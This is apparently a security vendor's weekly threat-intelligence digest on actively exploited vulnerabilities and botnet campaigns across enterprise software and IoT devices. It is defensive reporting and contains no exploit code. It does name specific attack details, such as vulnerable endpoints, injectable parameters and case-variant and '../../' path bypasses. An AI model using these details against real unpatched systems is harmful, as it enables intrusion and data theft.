This Week in Cybersecurity: Converging Threat Actors Exploiting Emerging and Legacy Vulnerabilities Across Enterprise and IoT Environments

This week’s threat activity highlights a sharp intersection of rapid exploitation and lingering exposure, where both newly disclosed and aging vulnerabilities are being actively leveraged across enterprise and IoT environments.  

CISA has expanded its KEV catalog with seven vulnerabilities spanning SimpleHelp, ConnectWise, Microsoft Windows, Samsung MagicINFO, D-Link routers, and Marimo, reflecting continued exploitation of widely deployed technologies. Parallel to this, active exploitation was observed in Qinglong, cPanel, and BerriAI's LiteLLM vulnerabilities, highlighting rapid attacker response following disclosure.  

Malware campaigns further amplified the threat landscape, demonstrating rapid weaponization and operational deployment by threat actors. According to Akamai, APT28 leveraged a Microsoft vulnerability, in a LNK-based campaign targeting Ukraine and EU entities, while separate activity involved exploitation of D-Link routers to deploy the Tuxnokill botnet and Fortinet-reported abuse of TBK DVR devices to distribute Nexcorium. Collectively, these developments illustrate a dual-front threat model where enterprise software weaknesses and IoT exposures are simultaneously exploited, reinforcing the critical need for timely patching and continuous monitoring.

Key points:

• 7 vulnerabilities added to the CISA KEV catalog
• Active exploitations observed in Qinglong, cPanel and LiteLLM vulnerabilities
• APT28 exploited a recently patched Microsoft vulnerability
• Mirai-Based Nexcorium and Tuxnokill botnets leveraged DVR and Legacy Router Vulnerabilities

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2026-3965 - Protection Mechanism Failure vulnerability in Qinglong

A Protection Mechanism Failure vulnerability in Qinglong exposes protected administrative endpoints through an authentication bypass caused by a misconfigured rewrite rule that maps /open/ requests to /api/. The flaw affects versions 2.20.1 and earlier and can be chained with CVE-2026-4047 to achieve remote code execution, stemming from a mismatch between middleware authorization logic and Express.js routing behavior. According to Snyk, active exploitation began in early February, with attackers targeting exposed panels to deploy cryptominers. Post-exploitation activity involved modification of config.sh and execution of a malicious process named “.fullgc,” designed to mimic legitimate system activity while consuming significant CPU resources. The campaign leveraged remote infrastructure hosting multi-architecture payloads and demonstrated persistence across varied deployment environments. Initial mitigation attempts were insufficient, with an effective fix later introduced to address the authentication bypass, and users were advised to update to latest patched version immediately.

CVE-2026-4047 - Protection Mechanism Failure vulnerability in Qinglong

A Protection Mechanism Failure vulnerability in Qinglong arises from inconsistent path handling, where authentication checks treat routes as case-sensitive (/api/) while the router processes them case-insensitively, allowing crafted requests such as /aPi/... to bypass authentication and access protected endpoints. The flaw affects versions 2.20.1 and earlier and can be chained with CVE-2026-3965 to achieve remote code execution, due to a mismatch between middleware authorization logic and Express.js routing behavior. According to Snyk, active exploitation was observed beginning in early February, targeting exposed Qinglong panels to deploy cryptominers. Post-exploitation activity involved modifying configuration files and executing a disguised process (“.fullgc”) to maintain persistence while consuming significant CPU resources. Initial mitigation attempts proved insufficient, with a comprehensive fix later implemented to properly enforce authentication checks. Users are strongly advised to update to the latest patched version to mitigate active exploitation.

CVE-2026-32202 - Protection Mechanism Failure vulnerability Microsoft Windows

A Protection Mechanism Failure vulnerability in Microsoft Windows allows an unauthorized attacker to perform spoofing over a network due to incomplete enforcement of security controls within Windows Shell. The flaw creates gaps in how network-based resources and paths are validated, resulting in limited confidentiality impact through exposure of sensitive information while not affecting integrity or availability. According to Akamai, the issue stems from an incomplete patch for CVE-2026-21510, previously exploited by APT28 alongside CVE-2026-21513 in an LNK-based exploit chain. Although SmartScreen mitigated the initial remote code execution vector, automatic UNC path resolution in Windows Explorer still triggered SMB connections to attacker-controlled servers, exposing Net-NTLMv2 hashes without user interaction. This residual gap enabled a zero-click authentication coercion vector, facilitating credential theft even after partial remediation. Microsoft addressed the vulnerability in its April 2026 Patch Tuesday release, later updating the advisory to confirm active exploitation, and it has now been added to the CISA KEV catalog.

CVE-2026-41940 - Authentication Bypass vulnerability in cPanel

An Authentication Bypass vulnerability in cPanel affects multiple authentication paths, allowing unauthorized access to hosting environments and potentially extending to server-wide control through its integration with WHM. The flaw impacts various supported versions due to weaknesses in authentication logic within cPanel’s multi-tier architecture, which governs access to files, databases, and email services. Exploitation enables attackers to bypass access controls and compromise the management plane, posing significant risks to data integrity and infrastructure security. According to watchTowr Labs, a proof-of-concept was released, confirming active in-the-wild exploitation and indicating that the vulnerability was weaponized as a zero-day targeting a large portion of internet-facing systems. Emergency patches were released across multiple versions, including 11.136.0.5, 11.134.0.20, 11.132.0.29, 11.126.0.54, 11.118.0.63, and 11.110.0.97. Administrators are strongly advised to apply updates immediately using the /scripts/upcp --force command, as unsupported legacy versions remain highly exposed.

CVE-2026-39987 - Remote Code Execution vulnerability in Marimo

A Pre-Authentication Remote Code Execution vulnerability in Marimo enables unauthenticated attackers to obtain a full pseudo-terminal (PTY) shell and execute arbitrary system commands. The flaw affects versions prior to 0.23.0 and resides in the /terminal/ws WebSocket endpoint, where missing authentication checks allow direct access to an interactive shell with the privileges of the Marimo process. Exploitation requires minimal effort, as attackers can simply establish a WebSocket connection without crafting complex payloads. Observed activity showed rapid weaponization, including proof-of-concept validation, filesystem reconnaissance, and credential harvesting from sensitive files such as .env and SSH keys within minutes of access. The vulnerability underscores the risks associated with exposing development tools in internet-facing environments. The issue was remediated in version 0.23.0, with active exploitation observed shortly after disclosure, and has now been added to the CISA KEV catalog.

CVE-2026-42208 - Pre-Authentication SQL Injection vulnerability in LiteLLM

A Pre-Authentication SQL Injection vulnerability in BerriAI's LiteLLM allows unauthenticated attackers to read sensitive data from the proxy’s underlying database in versions prior to 1.83.7. The flaw originates from improper handling of the Authorization: Bearer header, where lack of input sanitization enables injection of arbitrary SQL queries into the backend PostgreSQL database. According to Sysdig, attackers leveraged this weakness to execute crafted SELECT statements without valid credentials, performing targeted enumeration of high-value tables containing virtual API keys, provider credentials, and environment configurations. The vulnerability was added to the GitHub Advisory Database on April 24, 2026, with active exploitation observed within 36 hours, demonstrating rapid weaponization and attacker familiarity with LiteLLM’s schema. The availability of a public proof-of-concept further increases the risk of widespread exploitation, making immediate remediation critical. Organizations are strongly advised to upgrade to the patched release, version 1.83.7-stable, to mitigate exposure.

CVE-2025-29635 - Command Injection vulnerability in D-Link DIR-823X

A Command Injection vulnerability in D-Link DIR-823X allows an authorized attacker to execute arbitrary commands via crafted POST requests to the /goform/set_prohibiting endpoint in firmware versions 240126 and 24082. The flaw arises from improper input handling where attacker-controlled data from the macaddr parameter is passed through snprintf into a command buffer and executed via a system() call, enabling remote code execution. Although D-Link confirmed that affected devices reached End-of-Life (EOL) and End-of-Support (EOS) status in September 2025, recent investigations by Akamai revealed active exploitation in March 2026 targeting these legacy routers. Post-exploitation activity involved deployment of the Tuxnokill botnet, a Mirai-derived payload delivered via shell scripts, featuring XOR-encoded configuration, multi-architecture support, and command-and-control communication over port 44300.Despite the product’s EOL status, continued exploitation and emergence of Tuxnokill highlight persistent risks in unpatched IoT ecosystems, leading to its inclusion in the CISA KEV catalog.

CVE-2024-1708 - Path Traversal vulnerability in ConnectWise ScreenConnect

A Path Traversal vulnerability in ConnectWise ScreenConnect enables remote code execution through a “Zip Slip” flaw in the extension handling mechanism, where improper validation in the ZipDirectory.ExtractToDirectory method allows crafted archive paths (e.g., ../../) to write files outside intended directories. Affected versions include 23.9.7 and prior, where execution occurs with SYSTEM-level privileges, allowing attackers to deploy web shells or overwrite critical files for full compromise. According to Huntress, the vulnerability serves as the payload delivery stage of the “SlashAndGrab” exploit chain alongside CVE-2024-1709, enabling immediate privileged access and fueling large-scale ransomware campaigns. Despite being disclosed and patched by ConnectWise in version 23.9.8 in February 2024, exploitation has persisted, with Microsoft reporting recent abuse by Storm-1175 to deploy Medusa ransomware, alongside historical use by groups such as Black Basta and Bl00dy. The vulnerability has now been added to the CISA KEV catalog reflecting sustained in-the-wild exploitation.

CVE-2024-7399 - Path Traversal vulnerability in Samsung MagicINFO 9 Server

A Path Traversal vulnerability in Samsung MagicINFO 9 Server allows unauthenticated attackers to write arbitrary files with system-level privileges via improper input validation in the /MagicInfo/servlet/SWUpdateFileUploader endpoint. Affected versions include those prior to 21.1050.0, where lack of authentication and file validation enables upload of malicious JSP files, leading to remote code execution. According to SSD Advisory, the flaw stems from insecure handling of the fileName parameter, which is directly used to construct file paths without sanitization. Although Samsung addressed the issue in August 2024 with version 21.1050, public disclosure of technical details and proof-of-concept in April 2025 led to rapid in-the-wild exploitation. Historical activity shows use of this vulnerability to deploy Mirai botnet variants, highlighting its value for large-scale compromise and propagation. Despite being nearly two years old, the vulnerability continues to pose a significant risk and has now been added to the CISA KEV catalog, reflecting sustained exploitation.

CVE-2024-57726 - Missing Authorization vulnerability in SimpleHelp

A Missing Authorization vulnerability in SimpleHelp allows low-privileged technicians to generate API keys with excessive permissions, enabling privilege escalation to full server administrator access in affected versions v5.5.7 and prior. According to Horizon3.ai, this weakness forms part of a broader set of flaws that can be chained to download arbitrary files, upload malicious payloads, and achieve complete server takeover, ultimately compromising all connected client endpoints. Sophos MDR observed real-world exploitation where attackers abused SimpleHelp as a trusted RMM tool to conduct reconnaissance, exfiltrate sensitive data, and deploy DragonForce ransomware in a double-extortion campaign. Despite patches released in versions 5.5.8, 5.4.10, and 5.3.9, exploitation has persisted, with Microsoft attributing recent abuse to Storm-1175 for Medusa ransomware deployment, alongside historical use for DragonForce ransomware and Sliver malware. The vulnerability has now been added to the CISA KEV catalog, confirming active in-the-wild exploitation.  

CVE-2024-57728 - Path Traversal vulnerability in SimpleHelp

A Path Traversal vulnerability in SimpleHelp allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip) in affected versions v5.5.7 and prior. According to Horizon3.ai, this weakness forms part of a broader set of flaws that can be chained to download arbitrary files, upload malicious payloads, and achieve complete server takeover, ultimately compromising all connected client endpoints. Sophos MDR observed real-world exploitation where attackers abused SimpleHelp as a trusted RMM tool to conduct reconnaissance, exfiltrate sensitive data, and deploy DragonForce ransomware in a double-extortion campaign. Despite patches released in versions 5.5.8, 5.4.10, and 5.3.9, exploitation has persisted, with Microsoft attributing recent abuse to Storm-1175 for Medusa ransomware deployment, alongside historical use for DragonForce ransomware and Sliver malware. The vulnerability has now been added to the CISA KEV catalog, confirming active in-the-wild exploitation.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

APT28 Exploitation of CVE-2026-21510 via LNK-Based Attack Chain

According to Akamai, APT28 exploited CVE-2026-21510 as part of a coordinated LNK-based attack chain targeting Ukraine and EU entities in December 2025. The campaign leveraged weaponized LNK files to bypass Microsoft Defender SmartScreen and execute attacker-controlled code hosted on remote servers. The exploit chain combined CVE-2026-21513 and CVE-2026-21510, enabling execution of malicious DLLs via UNC paths through Windows Shell namespace parsing. The vulnerability stemmed from improper input validation in the handling of Control Panel (CPL) objects, allowing unauthorized code execution during file parsing. Microsoft addressed these flaws in February 2026 Patch Tuesday; however, subsequent analysis revealed incomplete remediation that later led to CVE-2026-32202.

Mirai-Based Tuxnokill botnet leveraging legacy router vulnerabilities

According to Akamai, threat actors were observed exploiting CVE-2025-29635, a command injection vulnerability in end-of-life D-Link DIR-823X routers, to deploy a Mirai botnet variant named “tuxnokill.” The activity was detected in early March 2026 through honeypot telemetry, where attackers used shell scripts to deliver and execute the botnet payload. The campaign also attempted to exploit additional vulnerabilities, including CVE-2023-1389 in TP-Link Archer AX21 devices and a remote code execution flaw in ZTE ZXV10 H108L routers. These coordinated attacks targeted unpatched and legacy IoT devices to recruit them into botnet infrastructure. Once compromised, devices were leveraged to support distributed denial-of-service (DDoS) operations. The campaign reflected the continued reuse of Mirai source code, enabling both sophisticated and low-skilled actors to participate in botnet activity. The findings highlighted the persistent risk posed by outdated IoT hardware and the growing scale of automated exploitation campaigns.

Mirai-Based Nexcorium Botnet Leveraging DVR and Router vulnerabilities

According to Fortinet, a recent campaign exploited CVE-2024-3721, a command injection vulnerability in TBK DVR devices, to deploy a multi-architecture Mirai variant named Nexcorium. The activity targeted TBK DVR-4104 and DVR-4216 systems, where attackers leveraged the flaw to execute a downloader script that fetched architecture-specific botnet payloads. Once executed, the malware established control over compromised devices and demonstrated typical Mirai-based capabilities, including XOR-encoded configuration handling, watchdog mechanisms, and DDoS modules. The campaign also incorporated CVE-2017-17215 to further propagate by targeting Huawei HG532 devices within networks. In addition, the malware used hard-coded credentials to perform Telnet brute-force attacks, enabling lateral movement and infection expansion. Successful compromise allowed attackers to establish persistence through cron jobs and systemd services while connecting to command-and-control infrastructure for launching UDP, TCP, and SMTP-based DDoS attacks. The malware further employed defense evasion techniques by deleting its initial payload after execution. The campaign reflected continued exploitation of known vulnerabilities and weak credentials to build scalable IoT botnets capable of sustained and widespread impact.

Open-Source Software (OSS) vulnerabilities are security weaknesses discovered in publicly available codebases that can be exploited across widely used libraries, frameworks, and tools, often impacting thousands of downstream applications.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The week’s activity reinforces that both legacy and newly disclosed vulnerabilities are actively exploited, often within hours of public disclosure, across enterprise and IoT environments. The continued abuse of KEV-listed flaws highlights persistent gaps in patching and exposure management. Concurrent malware campaigns further demonstrate how quickly vulnerabilities are operationalized into large-scale attacks. Leveraging platforms like Loginsoft Vulnerability Intelligence (LOVI) enables proactive detection, prioritization, and response to emerging threats before they escalate.  

FAQs

1) What is SimpleHelp?

SimpleHelp is a Remote Monitoring and Management (RMM) platform used by managed service providers (MSPs) and IT teams to remotely access systems, deploy software, monitor endpoints, and provide technical support across distributed environments.    

2) What is ConnectWise ScreenConnect?

ConnectWise ScreenConnect is a remote monitoring and management (RMM) solution that enables secure remote desktop access, system administration, and support across enterprise environments.  

3) Does inclusion in the CISA KEV catalog mean exploitation is widespread?

Not necessarily widespread - but confirmed. KEV inclusion indicates verified in-the-wild exploitation. While the scale may vary, the operational reality is that threat actors possess working exploits, making patch prioritization urgent regardless of observed targeting volume.

4) How does LOVI help organizations manage vulnerabilities effectively?

Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

5) What is Cytellite?

Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.